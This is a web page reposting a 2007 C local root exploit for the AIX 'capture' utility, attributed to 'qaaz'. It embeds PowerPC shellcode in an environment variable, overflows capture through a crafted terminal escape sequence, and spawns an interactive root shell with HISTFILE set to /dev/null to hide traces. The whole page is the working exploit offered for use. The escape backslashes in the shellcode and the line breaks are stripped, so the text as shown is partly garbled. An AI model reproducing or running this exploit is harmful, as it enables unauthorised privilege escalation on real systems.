Home / os / solaris

aix53-capture.txt

Posted on 28 July 2007

/* 07/2007: public release * * qaaz@aix:~$ ./aix-capture * -------------------------------- * AIX capture Local Root Exploit * By qaaz * -------------------------------- * bash: no job control in this shell * bash-3.00# */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <sys/wait.h> #include <sys/select.h> #define TARGET "/usr/bin/capture" #define VALCNT 40 #define MAX(x,y) ((x) > (y) ? (x) : (y)) #define ALIGN(x, y) (((x) + (y) - 1) / (y) * (y)) unsigned char qaazcode[] = "x60x60x60x60x60x60x60x60" "x7cx63x1ax79x40x82xffxfd" "x7exa8x02xa6x3axb5x01x01" "x88x55xffx5bx3axd5xffx1b" "x7exc8x03xa6x4cxc6x33x42" "x44xffxffx02x38x75xffx5f" "x38x63x01x01x88x95xffx5d" "x38x63x01x02x38x63xfexff" "x88xa3xfexffx7cx04x28x40" "x40x82xffxf0x7cxa5x2ax78" "x98xa3xfexffx88x55xffx5c" "x38x75xffx5fx38x81xffxf8" "x90x61xffxf8x90xa1xffxfc" "x4bxffxffxbdxb8x05x7cxff"; void shell(int p1[2], int p2[2]) { ssize_t n; fd_set rset; char buf[4096]; for (;;) { FD_ZERO(&rset); FD_SET(p1[0], &rset); FD_SET(p2[0], &rset); n = select(MAX(p1[0], p2[0]) + 1, &rset, NULL, NULL, NULL); if (n < 0) { perror("[-] select"); break; } if (FD_ISSET(p1[0], &rset)) { n = read(p1[0], buf, sizeof(buf)); if (n <= 0) break; write(p1[1], buf, n); } if (FD_ISSET(p2[0], &rset)) { n = read(p2[0], buf, sizeof(buf)); if (n <= 0) break; write(p2[1], buf, n); } } } /* just because you don't understand it doesn't mean it has to be wrong */ ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[]) { ulong top, len, off; int i; len = 0; for (i = 0; argv[i]; i++) len += strlen(argv[i]) + 1; for (i = 0; envp[i]; i++) len += strlen(envp[i]) + 1; top = (ulong) argv[0] + ALIGN(len, 8); len = off = 0; for (i = 0; args[i]; i++) len += strlen(args[i]) + 1; for (i = 0; envs[i]; i++) { if (!strncmp(envs[i], "EGG=", 4)) off = len + 4; len += strlen(envs[i]) + 1; } while (off & 3) strcat(envs[0], "X"), off++, len++; return top - ALIGN(len, 4) + off; } int main(int argc, char *argv[], char *envp[]) { char pad[16] = "PAD=X", egg[512], bsh[128], buf[1024]; char *args[] = { TARGET, "/dev/null", NULL }; char *envs[] = { pad, bsh, egg, NULL }; int ptm, pts, pi[2]; pid_t child; sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid()); sprintf(bsh, "SHELL=/proc/%d/object/a.out", getpid()); if (!envp[0]) { dup2(3, 0); setuid(geteuid()); putenv("HISTFILE=/dev/null"); execl("/bin/bash", "bash", "-i", NULL); execl("/bin/sh", "sh", "-i", NULL); perror("[-] execl"); exit(1); } else if (argc && !strcmp(argv[0], "bsh")) { char i, ch; ulong addr = get_addr(argv, envp, args, envs); printf("x1b["); for (i = 0; i < VALCNT; i++) printf("%lu;", addr); printf("0A "); fflush(stdout); while (read(0, &ch, 1) == 1) write(1, &ch, 1); exit(0); } printf("-------------------------------- "); printf(" AIX capture Local Root Exploit "); printf(" By qaaz "); printf("-------------------------------- "); if (pipe(pi) < 0) { perror("[-] pipe"); exit(1); } if ((ptm = open("/dev/ptc", O_RDWR)) < 0 || (pts = open(ttyname(ptm), O_RDWR)) < 0) { perror("[-] pty"); exit(1); } if ((child = fork()) < 0) { perror("[-] fork"); exit(1); } if (child == 0) { dup2(pts, 0); dup2(pts, 1); dup2(pts, 2); dup2(pi[0], 3); execve(TARGET, args, envs); perror("[-] execve"); exit(1); } close(pi[0]); close(pts); sleep(1); read(ptm, buf, sizeof(buf)); write(ptm, " ", 1); shell((int[2]) { 0, pi[1] }, (int[2]) { ptm, 1 }); kill(child, SIGTERM); waitpid(child, NULL, 0); return 0; }

 

TOP